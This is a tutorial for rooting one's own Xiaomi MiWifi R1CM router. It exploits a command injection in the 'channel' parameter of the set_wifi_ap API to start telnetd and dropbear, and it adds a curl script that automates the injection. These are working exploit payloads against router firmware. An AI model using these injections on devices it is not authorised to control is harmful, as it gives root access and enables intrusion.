Enable ssh and telnet on Xiaomi MiWifi R1CM without registering with Xiaomi

Prerequisite:

Install an older Xiaomi "development" firmware, such as "miwifi_r1cm_firmware_46a10_2.7.63.bin". The steps below depend on this firmware; see the last section for what happens on "stable" firmware.

Obtain the session token (STOK value):

  1. Log in to your Xiaomi router with your browser.
  2. In the URL bar you will find something like this:
    http://192.168.31.1/cgi-bin/luci/;stok=ffff999ee999eee9999988888888fffff/web/home#router
  3. The value after "stok=" is the STOK value, the LuCI session token that authenticates every API call below (in the example above it is ffff999ee999eee9999988888888fffff). Anyone holding a valid STOK can make the same calls, so treat it like a password and do not paste these URLs anywhere public.

Enable Telnet:

Replace YOUR_STOK_VALUE in the URL below with your own STOK value, then paste the URL into your browser. The request abuses the set_wifi_ap API: the "channel" parameter is passed to a shell without validation, so appending "%3B" (an encoded ";") followed by a URL-encoded command makes the router run that command (as root, which is the account you get at the end). Decoded, the channel value below is "1;/usr/sbin/telnetd", which starts the telnet daemon.

http://192.168.31.1/cgi-bin/luci/;stok=YOUR_STOK_VALUE/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%3B%2Fusr%2Fsbin%2Ftelnetd

After a while it returns an error (the message means "Failed to connect to the specified Wi-Fi (Probe timeout)"). This is expected: the bogus access point "whatever" never connects, but the injected command has already run.
{"msg":"未能連線到指定Wi-Fi(Probe timeout)","code":1616} 

 
Next, set the password. YOUR_CURRENT_PWD is the password you currently use to log in to the admin page; YOUR_NEW_PWD is the password you want from now on.

http://192.168.31.1/cgi-bin/luci/;stok=YOUR_STOK_VALUE/api/xqsystem/set_name_password?oldPwd=YOUR_CURRENT_PWD&newPwd=YOUR_NEW_PWD

It will output:
{"code":0}

You should then be able to log in via Telnet with username root and your new password.

Reference: https://wiki.openwrt.org/toh/xiaomi/mini

Enable SSH without registering with Xiaomi


Replace YOUR_STOK_VALUE in the URLs below with your own STOK value, and YOUR_CURRENT_PASSWORD / YOUR_NEW_PASSWORD with your passwords. Then submit each URL in your browser, one by one, in this order. The three set_wifi_ap URLs use the same "channel" command injection as the Telnet step; the decoded command is given under each, and each returns the same "Failed to connect to the specified WiFi (Probe timeout)" error, which is normal.

http://192.168.31.1/cgi-bin/luci/;stok=YOUR_STOK_VALUE/api/xqnetwork/set_wifi_ap?ssid=tianbao&encryption=NONE&enctype=NONE&channel=1%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit

Decoded: nvram set ssh_en=1; nvram commit (turns the SSH flag on in NVRAM and saves it). It will output the error message below, which is normal:
 {"msg":"未能连接到指定WiFi(Probe timeout)","code":1616}

http://192.168.31.1/cgi-bin/luci/;stok=YOUR_STOK_VALUE/api/xqnetwork/set_wifi_ap?ssid=tianbao&encryption=NONE&enctype=NONE&channel=1%3Bsed%20%2Di%20%22%3Ax%3AN%3As%2Fif%20%5C%5B%2E%2A%5C%3B%20then%5Cn%2E%2Areturn%200%5Cn%2E%2Afi%2F%23tb%2F%3Bb%20x%22%20%2Fetc%2Finit.d%2Fdropbear

Decoded: sed -i ":x:N:s/if \[.*\; then\n.*return 0\n.*fi/#tb/;b x" /etc/init.d/dropbear (replaces the "if [ ... ]; then ... return 0 ... fi" guard that makes the dropbear init script exit early with a comment, so the service can start). It will output the error message below, which is normal:
 {"msg":"未能连接到指定WiFi(Probe timeout)","code":1616}

http://192.168.31.1/cgi-bin/luci/;stok=YOUR_STOK_VALUE/api/xqnetwork/set_wifi_ap?ssid=tianbao&encryption=NONE&enctype=NONE&channel=1%3B%2Fetc%2Finit.d%2Fdropbear%20start

Decoded: /etc/init.d/dropbear start (starts the SSH daemon now, without waiting for a reboot). It will output the error message below, which is normal:
 {"msg":"未能连接到指定WiFi(Probe timeout)","code":1616}

http://192.168.31.1/cgi-bin/luci/;stok=YOUR_STOK_VALUE/api/xqsystem/set_name_password?oldPwd=YOUR_CURRENT_PASSWORD&newPwd=YOUR_NEW_PASSWORD

It will output {"code":0}

Then you should be able to SSH to your router.


login as: root
root@192.168.31.1's password:
 

BusyBox v1.19.4 (2015-12-03 17:13:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

 -----------------------------------------------------
        Welcome to XiaoQiang!
 -----------------------------------------------------


Reference: https://www.jianshu.com/p/4317234e2175
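The Telnet and SSH procedures above, scripted end to end as an added example (this is not code from the original post, from the referenced pages, or from Xiaomi): it builds the same injected set_wifi_ap URLs the post pastes into the browser, sends them with curl, and checks the router's reply codes. The router address 192.168.31.1, the use of curl on the client machine, and the helper names (urlencode, inject_url, password_url, has_code, run_on_router) are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original post): scripts the set_wifi_ap command
# injection that the page drives by hand through the browser. Assumes the router
# is at 192.168.31.1 and that curl is installed on the client machine.
ROUTER=${ROUTER:-192.168.31.1}

# Percent-encode every byte that is not [A-Za-z0-9], which is how the page's URLs
# encode the injected commands (space -> %20, ';' -> %3B, '/' -> %2F, '_' -> %5F).
# ASCII input only; that is all these commands need.
urlencode() {
  s=$1; out=""
  while [ -n "$s" ]; do
    c=${s%"${s#?}"}       # first character of $s
    s=${s#?}              # rest of $s
    case $c in
      [A-Za-z0-9]) out="$out$c" ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;   # "'x" makes printf emit the byte value of x
    esac
  done
  printf '%s' "$out"
}

# URL that smuggles a shell command through the unvalidated "channel" parameter of
# set_wifi_ap: the value becomes "1;<command>", and the router runs <command> as root.
inject_url() {    # $1 = STOK, $2 = shell command to run on the router
  printf 'http://%s/cgi-bin/luci/;stok=%s/api/xqnetwork/set_wifi_ap?ssid=whatever&encryption=NONE&enctype=NONE&channel=1%%3B%s' \
    "$ROUTER" "$1" "$(urlencode "$2")"
}

# URL that changes the admin password, which the page shows is also the root login.
password_url() {  # $1 = STOK, $2 = current password, $3 = new password
  printf 'http://%s/cgi-bin/luci/;stok=%s/api/xqsystem/set_name_password?oldPwd=%s&newPwd=%s' \
    "$ROUTER" "$1" "$(urlencode "$2")" "$(urlencode "$3")"
}

# True when a JSON reply from the router carries the given "code" value.
has_code() {      # $1 = JSON reply, $2 = expected code
  printf '%s' "$1" | grep -q "\"code\":$2[,}]"
}

# Send one injected command and verify the router answered with the "Probe timeout"
# code 1616: the bogus access point never connects, but the command has already run.
run_on_router() { # $1 = STOK, $2 = shell command
  reply=$(curl -s "$(inject_url "$1" "$2")")
  has_code "$reply" 1616 || { echo "unexpected reply: $reply" >&2; return 1; }
}

# The full sequence from the page: telnetd, persistent dropbear, then the password.
# Runs only when invoked as: sh enable_access.sh <stok> <current_pw> <new_pw>
if [ $# -eq 3 ]; then
  run_on_router "$1" '/usr/sbin/telnetd'
  run_on_router "$1" 'nvram set ssh_en=1; nvram commit'
  run_on_router "$1" 'sed -i ":x:N:s/if \[.*\; then\n.*return 0\n.*fi/#tb/;b x" /etc/init.d/dropbear'
  run_on_router "$1" '/etc/init.d/dropbear start'
  reply=$(curl -s "$(password_url "$1" "$2" "$3")")
  has_code "$reply" 0 && echo "done: ssh or telnet to root@$ROUTER with the new password"
fi
```

Run it as sh enable_access.sh <stok> <current_pw> <new_pw>. The encoder percent-encodes every non-alphanumeric byte, which reproduces the page's URLs byte for byte. Note that the STOK and both passwords travel in the query string, so they end up in browser history, proxy logs and shell history just as they do with the manual method.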

Upgrade to the latest firmware

You can upgrade to the latest "development" firmware and SSH remains enabled:

login as: root
root@192.168.31.1's password:

BusyBox v1.19.4 (2017-09-28 19:06:08 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

 -----------------------------------------------------
       Welcome to XiaoQiang!
 -----------------------------------------------------
  $$$$$$\  $$$$$$$\  $$$$$$$$\      $$\      $$\        $$$$$$\  $$\   $$\
 $$  __$$\ $$  __$$\ $$  _____|     $$ |     $$ |      $$  __$$\ $$ | $$  |
 $$ /  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ /  $$ |$$ |$$  /
 $$$$$$$$ |$$$$$$$  |$$$$$\         $$ |     $$ |      $$ |  $$ |$$$$$  /
 $$  __$$ |$$  __$$< $$  __|        $$ |     $$ |      $$ |  $$ |$$  $$<
 $$ |  $$ |$$ |  $$ |$$ |           $$ |     $$ |      $$ |  $$ |$$ |\$$\
 $$ |  $$ |$$ |  $$ |$$$$$$$$\       $$$$$$$$$  |       $$$$$$  |$$ | \$$\
 \__|  \__|\__|  \__|\________|      \_________/        \______/ \__|  \__|





However, if you upgrade to a "stable" firmware, the SSH function will be disabled.

To get it back, flash an old "development" firmware again and start over from the beginning.



